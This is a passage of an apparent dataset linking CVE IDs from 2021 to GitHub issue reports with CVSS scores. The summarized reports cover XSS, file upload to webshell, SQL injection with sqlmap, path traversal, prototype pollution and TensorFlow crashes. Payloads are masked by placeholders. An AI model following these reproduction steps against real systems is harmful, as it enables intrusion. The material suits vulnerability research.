  71488. },
  71489. {
  71490. "CVE_ID": "CVE-2021-40927",
  71491. "Issue_Url_old": "https://github.com/citelao/Spotify-for-Alfred/issues/137",
  71492. "Issue_Url_new": "https://github.com/citelao/spotify-for-alfred/issues/137",
  71493. "Repo_new": "citelao/spotify-for-alfred",
  71494. "Issue_Created_At": "2021-09-13T01:49:14Z",
  71495. "description": "APITAG XSS in FILETAG . Describe the bug Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. To Reproduce Steps to reproduce the behavior NUMBERTAG Access to the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled parameter ERRORTAG without sufficient sanitization: URLTAG",
  71496. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71497. "severity": "MEDIUM",
  71498. "baseScore": 6.1,
  71499. "impactScore": 2.7,
  71500. "exploitabilityScore": 2.8
  71501. },
  71502. {
  71503. "CVE_ID": "CVE-2021-40928",
  71504. "Issue_Url_old": "https://github.com/d8ahazard/FlexTV/issues/37",
  71505. "Issue_Url_new": "https://github.com/d8ahazard/flextv/issues/37",
  71506. "Repo_new": "d8ahazard/flextv",
  71507. "Issue_Created_At": "2021-09-13T02:14:03Z",
  71508. "description": "APITAG XSS in FILETAG of Phlex and APITAG NUMBERTAG Are you hosting your own version of Flex TV, or using the one at FILETAG Yes NUMBERTAG On what OS are you running Flex TV? Ubuntu NUMBERTAG Are you using a new instance of XAMPP, or an existing webserver? Apache NUMBERTAG Turn on the APITAG in APITAG NUMBERTAG b. If not XAMPP, what APITAG stack are you using? No NUMBERTAG Have you enabled the sockets module and ensured PHP has write access to the directory containing Flex TV? Yes Description: Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Steps To Reproduce NUMBERTAG Go to the page with the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled input APITAG in APITAG without sufficient sanitization: URLTAG For Phlex: URLTAG",
  71509. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71510. "severity": "MEDIUM",
  71511. "baseScore": 6.1,
  71512. "impactScore": 2.7,
  71513. "exploitabilityScore": 2.8
  71514. },
  71515. {
  71516. "CVE_ID": "CVE-2021-40940",
  71517. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/471",
  71518. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/471",
  71519. "Repo_new": "monstra-cms/monstra",
  71520. "Issue_Created_At": "2021-09-08T14:55:01Z",
  71521. "description": "Monstra NUMBERTAG case without filtering leads to unrestricted file upload vulnerability. Brief of this vulnerability The Monstra NUMBERTAG source code does not filter the case of php, which leads to an unrestricted file upload vulnerability. Test Environment APITAG Affect version APITAG POC ERRORTAG APITAG FILETAG Reason of This Vulnerability APITAG in the Upload file module does not check whether the file extension is APITAG file\uff1a APITAG ERRORTAG Repair suggestions Add case verification at $_FILES['file']['name'], as follows: ERRORTAG",
  71522. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71523. "severity": "CRITICAL",
  71524. "baseScore": 9.8,
  71525. "impactScore": 5.9,
  71526. "exploitabilityScore": 3.9
  71527. },
  71528. {
  71529. "CVE_ID": "CVE-2021-40941",
  71530. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/644",
  71531. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/644",
  71532. "Repo_new": "axiomatic-systems/bento4",
  71533. "Issue_Created_At": "2021-08-25T02:03:31Z",
  71534. "description": "allocator is out of memory in APITAG How to reproduce: CODETAG You can see the asan information below: ERRORTAG",
  71535. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  71536. "severity": "HIGH",
  71537. "baseScore": 7.5,
  71538. "impactScore": 3.6,
  71539. "exploitabilityScore": 3.9
  71540. },
  71541. {
  71542. "CVE_ID": "CVE-2021-40942",
  71543. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1908",
  71544. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1908",
  71545. "Repo_new": "gpac/gpac",
  71546. "Issue_Created_At": "2021-09-07T10:07:06Z",
  71547. "description": "heap buffer overflow in APITAG at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...) Step to reproduce: CODETAG Env: Ubuntu NUMBERTAG clang NUMBERTAG My cmd line an ASAN report APITAG add PATHTAG new new.mp4 ERRORTAG",
  71548. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71549. "severity": "MEDIUM",
  71550. "baseScore": 5.5,
  71551. "impactScore": 3.6,
  71552. "exploitabilityScore": 1.8
  71553. },
  71554. {
  71555. "CVE_ID": "CVE-2021-40943",
  71556. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/643",
  71557. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/643",
  71558. "Repo_new": "axiomatic-systems/bento4",
  71559. "Issue_Created_At": "2021-08-25T02:00:03Z",
  71560. "description": "Null pointer reference in APITAG How to reproduce: CODETAG You can see the asan information below: ERRORTAG FILETAG",
  71561. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71562. "severity": "MEDIUM",
  71563. "baseScore": 5.5,
  71564. "impactScore": 3.6,
  71565. "exploitabilityScore": 1.8
  71566. },
  71567. {
  71568. "CVE_ID": "CVE-2021-40944",
  71569. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1906",
  71570. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1906",
  71571. "Repo_new": "gpac/gpac",
  71572. "Issue_Created_At": "2021-09-01T07:25:03Z",
  71573. "description": "Null pointer reference in GPAC at PATHTAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...) Step to reproduce: CODETAG I'm not sure if it's a correct usage of \"nhmlr filter\" , or by which way could i parse nhml file? Env: Ubuntu NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG",
  71574. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71575. "severity": "MEDIUM",
  71576. "baseScore": 5.5,
  71577. "impactScore": 3.6,
  71578. "exploitabilityScore": 1.8
  71579. },
  71580. {
  71581. "CVE_ID": "CVE-2021-40954",
  71582. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/11",
  71583. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/11",
  71584. "Repo_new": "bettershop/laiketui",
  71585. "Issue_Created_At": "2021-09-10T09:35:05Z",
  71586. "description": "Any file upload exists at the background plug in. Any file upload exists at the background plug in FILETAG Locate file\uff1a PATHTAG FILETAG Firstly, the upload format is not filtered. Secondly, uploading the compressed package will decompress the index file in the compressed package and automatically include the file As a result, files with any suffix can be uploaded or compressed packages can be uploaded. The compressed packages contain webshell files FILETAG Upload succeeded\uff01 FILETAG The file is in the PATHTAG Let's visit FILETAG",
  71587. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71588. "severity": "CRITICAL",
  71589. "baseScore": 9.8,
  71590. "impactScore": 5.9,
  71591. "exploitabilityScore": 3.9
  71592. },
  71593. {
  71594. "CVE_ID": "CVE-2021-40955",
  71595. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/12",
  71596. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/12",
  71597. "Repo_new": "bettershop/laiketui",
  71598. "Issue_Created_At": "2021-09-10T12:12:54Z",
  71599. "description": "Background SQL injection. Background SQL injection FILETAG Parameter id is not filtered FILETAG The corresponding url is URLTAG FILETAG Using sleep function to delay NUMBERTAG seconds as an example FILETAG FILETAG Using sleep function to delay NUMBERTAG seconds as an example FILETAG Get the database through sqlmap FILETAG",
  71600. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  71601. "severity": "HIGH",
  71602. "baseScore": 7.2,
  71603. "impactScore": 5.9,
  71604. "exploitabilityScore": 1.2
  71605. },
  71606. {
  71607. "CVE_ID": "CVE-2021-40956",
  71608. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/13",
  71609. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/13",
  71610. "Repo_new": "bettershop/laiketui",
  71611. "Issue_Created_At": "2021-09-11T12:30:37Z",
  71612. "description": "SQL injection exists in the APITAG menu management function. SQL injection exists in the APITAG menu management function FILETAG The link where SQL injection exists is APITAG Locate the vulnerable file APITAG FILETAG Because the parameter id is not filtered, it leads to SQL injection vulnerabilities ERRORTAG Use burpsuite to request url APITAG FILETAG View SQL monitoring FILETAG Use sqlmap SQL injection Get the database FILETAG",
  71613. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71614. "severity": "HIGH",
  71615. "baseScore": 7.5,
  71616. "impactScore": 3.6,
  71617. "exploitabilityScore": 3.9
  71618. },
  71619. {
  71620. "CVE_ID": "CVE-2021-40978",
  71621. "Issue_Url_old": "https://github.com/nisdn/CVE-2021-40978/issues/1",
  71622. "Issue_Url_new": "https://github.com/nisdn/cve-2021-40978/issues/1",
  71623. "Repo_new": "nisdn/cve-2021-40978",
  71624. "Issue_Created_At": "2021-10-07T18:27:12Z",
  71625. "description": "Did you report this upstream?. Did you report this upstream?",
  71626. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71627. "severity": "HIGH",
  71628. "baseScore": 7.5,
  71629. "impactScore": 3.6,
  71630. "exploitabilityScore": 3.9
  71631. },
  71632. {
  71633. "CVE_ID": "CVE-2021-40978",
  71634. "Issue_Url_old": "https://github.com/mkdocs/mkdocs/issues/2601",
  71635. "Issue_Url_new": "https://github.com/mkdocs/mkdocs/issues/2601",
  71636. "Repo_new": "mkdocs/mkdocs",
  71637. "Issue_Created_At": "2021-10-08T03:48:27Z",
  71638. "description": "CVETAG Path Traversal.. Hey! We have verified a security flaw in the current version of APITAG a path traversal failure affecting the built in dev server. That flaw turns the server susceptible to providing data outside the scope of the application allowing anyone to request sensitive files. If you need further information, don't hesitate to get in touch with me. CVETAG URLTAG",
  71639. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71640. "severity": "HIGH",
  71641. "baseScore": 7.5,
  71642. "impactScore": 3.6,
  71643. "exploitabilityScore": 3.9
  71644. },
  71645. {
  71646. "CVE_ID": "CVE-2021-40985",
  71647. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/444",
  71648. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/444",
  71649. "Repo_new": "michaelrsweet/htmldoc",
  71650. "Issue_Created_At": "2021-08-02T07:44:48Z",
  71651. "description": "stack buffer underflow in htmldoc. os: ubuntu NUMBERTAG htmldoc version: master branch command : ./htmldoc webpage f FILETAG . APITAG FILETAG asan report ERRORTAG",
  71652. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71653. "severity": "MEDIUM",
  71654. "baseScore": 5.5,
  71655. "impactScore": 3.6,
  71656. "exploitabilityScore": 1.8
  71657. },
  71658. {
  71659. "CVE_ID": "CVE-2021-4103",
  71660. "Issue_Url_old": "https://github.com/Vanessa219/vditor/issues/1133",
  71661. "Issue_Url_new": "https://github.com/vanessa219/vditor/issues/1133",
  71662. "Repo_new": "vanessa219/vditor",
  71663. "Issue_Created_At": "2021-12-12T01:41:08Z",
  71664. "description": "XSS \u6f0f\u6d1e. APITAG",
  71665. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71666. "severity": "MEDIUM",
  71667. "baseScore": 5.4,
  71668. "impactScore": 2.7,
  71669. "exploitabilityScore": 2.3
  71670. },
  71671. {
  71672. "CVE_ID": "CVE-2021-41036",
  71673. "Issue_Url_old": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96",
  71674. "Issue_Url_new": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96",
  71675. "Repo_new": "eclipse/paho.mqtt.embedded-c",
  71676. "Issue_Created_At": "2017-06-21T06:12:07Z",
  71677. "description": "should check rem_len size in readpacket..",
  71678. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71679. "severity": "CRITICAL",
  71680. "baseScore": 9.8,
  71681. "impactScore": 5.9,
  71682. "exploitabilityScore": 3.9
  71683. },
  71684. {
  71685. "CVE_ID": "CVE-2021-41043",
  71686. "Issue_Url_old": "https://github.com/the-tcpdump-group/tcpslice/issues/11",
  71687. "Issue_Url_new": "https://github.com/the-tcpdump-group/tcpslice/issues/11",
  71688. "Repo_new": "the-tcpdump-group/tcpslice",
  71689. "Issue_Created_At": "2021-06-30T11:50:26Z",
  71690. "description": "Heap use after free. Tested on: version NUMBERTAG PRE GIT version NUMBERTAG a3 Command: tcpslice w FILETAG APITAG Segmentation fault Results NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG ffff NUMBERTAG fa7d bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffce NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG ffff NUMBERTAG fa7c in vsnprintf ( PATHTAG NUMBERTAG ffff NUMBERTAG in __snprintf_chk ( PATHTAG NUMBERTAG ffff NUMBERTAG ee in pcap_dump_open ( PATHTAG NUMBERTAG ea4 in extract_slice APITAG NUMBERTAG ea4 in main APITAG NUMBERTAG ffff NUMBERTAG a0b2 in __libc_start_main ( PATHTAG NUMBERTAG eadd in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  71691. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71692. "severity": "MEDIUM",
  71693. "baseScore": 5.5,
  71694. "impactScore": 3.6,
  71695. "exploitabilityScore": 1.8
  71696. },
  71697. {
  71698. "CVE_ID": "CVE-2021-41061",
  71699. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16844",
  71700. "Issue_Url_new": "https://github.com/riot-os/riot/issues/16844",
  71701. "Repo_new": "riot-os/riot",
  71702. "Issue_Created_At": "2021-09-14T07:24:59Z",
  71703. "description": "ieee NUMBERTAG security: Nonce is reused after reboot. Description The frame counter used with ieee NUMBERTAG security is initialized with NUMBERTAG at startup. While it is protected against overflow, it is not protected against being reset, and that reset happens whenever the device restarts. As the key is flashed into the device in ieee NUMBERTAG security's normal operation, and the sender LL address is constant per device, the same nonce (varying only through the resetting frame counter) is used in the AES encryption multiple times. Reuse of the same (nonce, key) breaks confidentiality guarantees. (AES CCM is used here, so AIU it's not as bad URLTAG as if GCM were used, when there'd be key leakage). Steps to reproduce the issue APITAG done on microbit NUMBERTAG I have high confidence in this working on any APITAG encryption capable device). Sniff for packages, eg. by building the default module. Build the gcoap example with APITAG Send out a GET request to the sniffer module, path APITAG Repeat the request a few times (to cancel any jitter in the number of messages sent during startup) Reboot the device, eg. by power cycling it Send out GET requests to the same address, path APITAG Expected results Requests after the reboot use different sequence numbers. Actual results Requests after the reboot start from the same zero sequence number again. Requests have byte wise identical requests in regions of equal content, eg. (asterisks mine) ERRORTAG ERRORTAG APITAG the APITAG in the second row where the shared \"l\" of \"hello\" and \"well\" is, as well as the NUMBERTAG co\" of the \"core\" / \"coap\" option; variation is in MIDs (first row bytes NUMBERTAG token (second row, first NUMBERTAG bytes) and the diverting texts). Versions and cross references All since introduction in NUMBERTAG until current HEAD. Since NUMBERTAG the module in question has been marked as experimental. Disclosing this has been discussed in the closed security list URLTAG , and was deemed responsible given the overall circumstances. CVETAG CVETAG has been assigned to this issue. Road forward This is not trivial to fix, as we don't have any committed persistence inside generic devices, and even with APITAG minimal security the problem is just shifted (for FILETAG requires monotony of ASNs on the device which is equivalent to this problem, although it'd shift the attack difficulty to an active replay of old beacons). Likewise, most advanced modes need persistence, until (with ace ake authz URLTAG asymmetric negotiation comes into play. Off my head I don't know any standard solutions that can do with neither asymmetric cryptography nor local persistence; some randomness based scheme could possibly be deployed but it'd be very ad hoc, custom and eventually not easier than the existing solutions. I think that the discussion in NUMBERTAG can serve as a starting point.",
  71704. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  71705. "severity": "MEDIUM",
  71706. "baseScore": 5.5,
  71707. "impactScore": 3.6,
  71708. "exploitabilityScore": 1.8
  71709. },
  71710. {
  71711. "CVE_ID": "CVE-2021-41097",
  71712. "Issue_Url_old": "https://github.com/aurelia/path/issues/44",
  71713. "Issue_Url_new": "https://github.com/aurelia/path/issues/44",
  71714. "Repo_new": "aurelia/path",
  71715. "Issue_Created_At": "2021-05-14T09:04:12Z",
  71716. "description": "Prototype Pollution. I'm submitting a bug report APITAG of aurelia path is vulnerable to prototype pollution. POC aurelia blog is using APITAG to parse APITAG so it is vulnerable to prototype pollution NUMBERTAG Open the following URL: URLTAG NUMBERTAG Open Devtools Console, and check the APITAG NUMBERTAG You can notice Object being polluted with the \"asdf\" property.",
  71717. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  71718. "severity": "HIGH",
  71719. "baseScore": 7.5,
  71720. "impactScore": 3.6,
  71721. "exploitabilityScore": 3.9
  71722. },
  71723. {
  71724. "CVE_ID": "CVE-2021-41128",
  71725. "Issue_Url_old": "https://github.com/beatrichartz/csv/issues/103",
  71726. "Issue_Url_new": "https://github.com/beatrichartz/csv/issues/103",
  71727. "Repo_new": "beatrichartz/csv",
  71728. "Issue_Created_At": "2021-10-06T08:33:36Z",
  71729. "description": "Encode Formulas to prevent CSV injection. If this is a feature request, why do we need it? We are using this library to generate CSVs for user generated input and transmitting them to another party. APITAG sadly requires a CSV and not a sane format like a JSON) We did a pentest on the application The pentest uncovered a CSV Injection vulnerability URLTAG , if the user generated input includes formulas like APITAG To address this, I suggest to implement encoding of APITAG as APITAG If this is a bug, steps to reproduce it Generate a CSV with a cell value of APITAG Open with Excel See value APITAG Is your input CSV RFC NUMBERTAG URLTAG compliant? Yes Are you interested in helping with a PR? Yes",
  71730. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  71731. "severity": "HIGH",
  71732. "baseScore": 8.8,
  71733. "impactScore": 5.9,
  71734. "exploitabilityScore": 2.8
  71735. },
  71736. {
  71737. "CVE_ID": "CVE-2021-41170",
  71738. "Issue_Url_old": "https://github.com/sroehrl/neoan3-template/issues/8",
  71739. "Issue_Url_new": "https://github.com/sroehrl/neoan3-template/issues/8",
  71740. "Repo_new": "sroehrl/neoan3-template",
  71741. "Issue_Created_At": "2021-10-21T23:24:03Z",
  71742. "description": "Closure injection has a vulnerability. In the template evaluation, closures are evaluated based on whether a value is callable within the current scope. In theory, one could create a multi step attack by storing particular values into the database that are known to be eventually rendered by the template engine. would the value of such a key happen to be a callable, one could execute global or local functions & methods. While it is unclear how one could use this to exploit neoan3, this constitutes a security concern.",
  71743. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71744. "severity": "CRITICAL",
  71745. "baseScore": 9.8,
  71746. "impactScore": 5.9,
  71747. "exploitabilityScore": 3.9
  71748. },
  71749. {
  71750. "CVE_ID": "CVE-2021-41189",
  71751. "Issue_Url_old": "https://github.com/DSpace/DSpace/issues/7928",
  71752. "Issue_Url_new": "https://github.com/dspace/dspace/issues/7928",
  71753. "Repo_new": "dspace/dspace",
  71754. "Issue_Created_At": "2021-09-02T14:01:40Z",
  71755. "description": "REST service returns wrong object for the APITAG group. Describe the bug The APITAG group has the APITAG collection as linked object: URLTAG URLTAG This is not true, as it's not a APITAG group. FILETAG Related work URLTAG",
  71756. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  71757. "severity": "HIGH",
  71758. "baseScore": 7.2,
  71759. "impactScore": 5.9,
  71760. "exploitabilityScore": 1.2
  71761. },
  71762. {
  71763. "CVE_ID": "CVE-2021-41195",
  71764. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46888",
  71765. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46888",
  71766. "Repo_new": "tensorflow/tensorflow",
  71767. "Issue_Created_At": "2021-02-03T16:47:27Z",
  71768. "description": "PATHTAG crashes(aborts) when segment_ids is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior PATHTAG crashes(aborts) when APITAG is large Describe the expected behavior expect an exception message if the input is unexpected instead of crash Standalone code to reproduce the issue ~~~python APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71769. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71770. "severity": "MEDIUM",
  71771. "baseScore": 5.5,
  71772. "impactScore": 3.6,
  71773. "exploitabilityScore": 1.8
  71774. },
  71775. {
  71776. "CVE_ID": "CVE-2021-41196",
  71777. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/51936",
  71778. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/51936",
  71779. "Repo_new": "tensorflow/tensorflow",
  71780. "Issue_Created_At": "2021-09-10T21:36:31Z",
  71781. "description": "APITAG crashes. System information Have I written custom code (as opposed to using a stock example script provided in APITAG yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: n/a APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): n/a APITAG version (if compiling from source): n/a APITAG version: n/a GPU model and memory: n/a Describe the current behavior APITAG crashes when APITAG contains APITAG , and outputs a all inf tensor when APITAG contains negative values. Describe the expected behavior Expect a ERRORTAG to be thrown if the input APITAG contains zero or negative values. Standalone code to reproduce the issue If the APITAG has APITAG : ERRORTAG Outputs: ERRORTAG If the APITAG has negative values: ERRORTAG The output is a tensor with shape = APITAG and all inf values.",
  71782. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71783. "severity": "MEDIUM",
  71784. "baseScore": 5.5,
  71785. "impactScore": 3.6,
  71786. "exploitabilityScore": 1.8
  71787. },
  71788. {
  71789. "CVE_ID": "CVE-2021-41197",
  71790. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46890",
  71791. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46890",
  71792. "Repo_new": "tensorflow/tensorflow",
  71793. "Issue_Created_At": "2021-02-03T17:44:30Z",
  71794. "description": "PATHTAG crash(abort). System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior The following APIs crash(abortion) when the given size is large tf. APITAG APITAG tf. APITAG tf. APITAG Describe the expected behavior expect exception messages if the input is not expected instead of crash Standalone code to reproduce the issue APITAG ~~~python import tensorflow as tf import numpy as np APITAG size NUMBERTAG Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~ APITAG ~~~python import tensorflow as tf import numpy as np APITAG target_height NUMBERTAG target_width NUMBERTAG Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~ ERRORTAG ~~~python import tensorflow as tf import numpy as np APITAG target_height NUMBERTAG target_width NUMBERTAG offset_height NUMBERTAG offset_width NUMBERTAG Output ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~ APITAG ~~~python import tensorflow as tf import numpy as np APITAG size NUMBERTAG APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG n NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71795. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71796. "severity": "MEDIUM",
  71797. "baseScore": 5.5,
  71798. "impactScore": 3.6,
  71799. "exploitabilityScore": 1.8
  71800. },
  71801. {
  71802. "CVE_ID": "CVE-2021-41197",
  71803. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/51908",
  71804. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/51908",
  71805. "Repo_new": "tensorflow/tensorflow",
  71806. "Issue_Created_At": "2021-09-09T18:05:47Z",
  71807. "description": "tf.pad crashes with large paddings. System information Have I written custom code (as opposed to using a stock example script provided in APITAG Yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): N/A APITAG version (if compiling from source): N/A APITAG version: N/A GPU model and memory: N/A Describe the current behavior APITAG crashes when the argument \"paddings\" has large values. Describe the expected behavior Expect an exception to be thrown if the input paddings is unexpected. Standalone code to reproduce the issue ERRORTAG outputs: APITAG",
  71808. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71809. "severity": "MEDIUM",
  71810. "baseScore": 5.5,
  71811. "impactScore": 3.6,
  71812. "exploitabilityScore": 1.8
  71813. },
  71814. {
  71815. "CVE_ID": "CVE-2021-41198",
  71816. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46911",
  71817. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46911",
  71818. "Repo_new": "tensorflow/tensorflow",
  71819. "Issue_Created_At": "2021-02-04T04:10:44Z",
  71820. "description": "tf. APITAG crash(aborts) when n is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crash(aborts) when n is large Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG n NUMBERTAG Output ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71821. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71822. "severity": "MEDIUM",
  71823. "baseScore": 5.5,
  71824. "impactScore": 3.6,
  71825. "exploitabilityScore": 1.8
  71826. },
  71827. {
  71828. "CVE_ID": "CVE-2021-41199",
  71829. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46914",
  71830. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46914",
  71831. "Repo_new": "tensorflow/tensorflow",
  71832. "Issue_Created_At": "2021-02-04T04:45:22Z",
